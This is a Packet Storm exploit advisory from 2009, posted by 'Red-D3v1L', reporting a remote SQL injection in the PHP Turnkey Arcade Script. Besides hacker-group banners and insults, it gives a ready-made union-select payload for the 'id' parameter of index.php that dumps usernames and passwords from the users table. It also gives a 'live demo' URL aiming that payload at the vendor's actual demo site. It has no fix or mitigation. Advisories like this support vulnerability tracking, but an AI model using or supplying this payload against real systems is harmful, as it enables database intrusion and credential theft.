Turnkey Arcade Script SQL Injection

2009-08-25T00:00:00
ID PACKETSTORM:80620
Type packetstorm
Reporter Red-D3v1L
Modified 2009-08-25T00:00:00

Description

                                        
                                            `==============================================================================  
## Hackteach.OrG ##  
  
  
/ ___ )( __ )/ ___ )  
\/ ) || ( ) |\/ ) |  
/ )| | / | / )  
/ / | (/ /) | / /   
/ / | / | | / /   
/ (_/\| (__) | / (_/\  
(_______/(_______)(_______/  
  
==============================================================================  
[»] ~ Note : Hacker R0x Lamerz Sux !  
==============================================================================  
[»] Arcad site Script <== Remote SQL Injection Vulnerability  
==============================================================================  
[»] my home: [ Hackteach.org ]  
[»] Script: [ Arcad site Script ]  
[»] Language: [ PHP ]  
[»] Download: [ http://www.turnkeyarcade.com/ ]  
[»] Founder: [ Red-D3v1L < php-c0de@hotmail.com > ]  
[»] Gr44tz to: [ All member Hackteach.org/cc - Str0ke - sp3x ]  
[»] Fuck To : [ Anti-trust << Big Big Big Lamer << ]  
########################################################################  
  
===[ Exploit SQL ]===   
  
[»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--  
  
  
[»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--  
  
Author: Red-D3v1L <-  
  
###########################################################################  
  
`